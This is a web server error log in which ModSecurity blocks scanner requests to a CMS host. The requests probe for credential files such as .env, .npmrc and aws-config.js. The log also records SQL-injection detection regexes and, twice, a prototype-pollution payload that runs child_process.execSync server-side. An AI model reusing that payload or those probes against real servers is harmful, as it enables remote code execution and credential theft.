"([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/.gitlab-ci.yml"] [unique_id "aTQxmzVNQf_oW9-JXCpPyAAAAJA"], referer: https://www.google.com/ [Sat Dec 06 15:37:31.640584 2025] [:error] [pid 27206:tid 27287] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/config.json"] [unique_id "aTQxmzVNQf_oW9-JXCpPyQAAAJc"], referer: https://www.google.com/ [Sat Dec 06 15:37:31.830654 2025] [:error] [pid 27206:tid 27285] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/config.js"] [unique_id "aTQxmzVNQf_oW9-JXCpPygAAAJY"], referer: https://www.google.com/ [Sat Dec 06 15:37:32.010154 2025] [:error] [pid 27206:tid 27264] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/aws-config.js"] [unique_id "aTQxnDVNQf_oW9-JXCpPywAAAIs"], referer: https://www.google.com/ [Sat Dec 06 15:37:32.141930 2025] [:error] [pid 27206:tid 27257] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/aws.config.js"] [unique_id "aTQxnDVNQf_oW9-JXCpPzAAAAIc"], referer: https://www.google.com/ [Sat Dec 06 15:37:32.248737 2025] [:error] [pid 27206:tid 27259] [client 195.178.110.201:41694] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/broadway-north-at-estrella-vista/?utm_source=vanity&utm_medium=redirect&utm_campaign=broadwaynorthliving&original_referrer=https://broadwaynorthliving.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/.npmrc"] [unique_id "aTQxnDVNQf_oW9-JXCpPzQAAAIg"], referer: https://www.google.com/ [Mon Dec 08 11:38:25.882935 2025] [:error] [pid 16540:tid 16561] [client 98.92.218.27:49670] [client 98.92.218.27] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env"] [unique_id "aTackRZS7M1OqokKpiVCMgAAANM"] [Mon Dec 08 14:48:00.192863 2025] [:error] [pid 30812:tid 30863] [client 52.89.200.61:44638] [client 52.89.200.61] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env"] [unique_id "aTbJANSextkjCJfEVFPaUgAAAIU"] [Tue Dec 09 18:06:26.303121 2025] [:error] [pid 10047:tid 10070] [client 3.96.200.128:51684] [client 3.96.200.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aThJAm-neFT78GCR9wiSBwAAANQ"] [Wed Dec 10 18:44:45.096738 2025] [:error] [pid 3563:tid 3576] [client 216.73.216.21:9476] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/common-base-color.php on line 3 [Wed Dec 10 18:48:14.558616 2025] [autoindex:error] [pid 8150:tid 8173] [client 216.73.216.21:3524] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/img [Wed Dec 10 18:48:14.711275 2025] [:error] [pid 8150:tid 8165] [client 216.73.216.21:54172] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/lawyer-base-color.php on line 3 [Wed Dec 10 21:19:20.373587 2025] [:error] [pid 3655:tid 3676] [client 216.73.216.21:25357] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/common-base-color.php on line 3 [Wed Dec 10 21:22:23.207288 2025] [autoindex:error] [pid 3928:tid 3931] [client 216.73.216.21:60254] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.cms-1.dev-unit.com/assets/front/img [Wed Dec 10 21:22:23.336205 2025] [:error] [pid 3655:tid 3675] [client 216.73.216.21:55007] PHP Warning: Undefined array key "color" in /home/id/cms-1.dev-unit.com/assets/front/css/lawyer-base-color.php on line 3 [Thu Dec 11 19:07:59.163722 2025] [:error] [pid 11440:tid 11484] [client 35.86.189.193:44036] [client 35.86.189.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aTr6b-KYL8Nz2WvbYONbnwAAAVc"] [Thu Dec 11 19:59:07.243702 2025] [:error] [pid 11440:tid 11461] [client 216.73.216.61:64598] [client 216.73.216.61] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aTsGa-KYL8Nz2WvbYONxFwAAAUA"] [Thu Dec 11 23:00:48.639451 2025] [:error] [pid 5306:tid 5369] [client 216.73.216.61:17578] [client 216.73.216.61] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aTsxANjp4gorx3NZH71UXAAAAQo"] [Sat Dec 13 12:19:26.039517 2025] [core:error] [pid 875:tid 882] [client 216.73.216.87:30763] AH10244: invalid URI path (/rss/Iceland-lab%27s-testing-suggests-50%-of-cases-have-no-symptoms/21)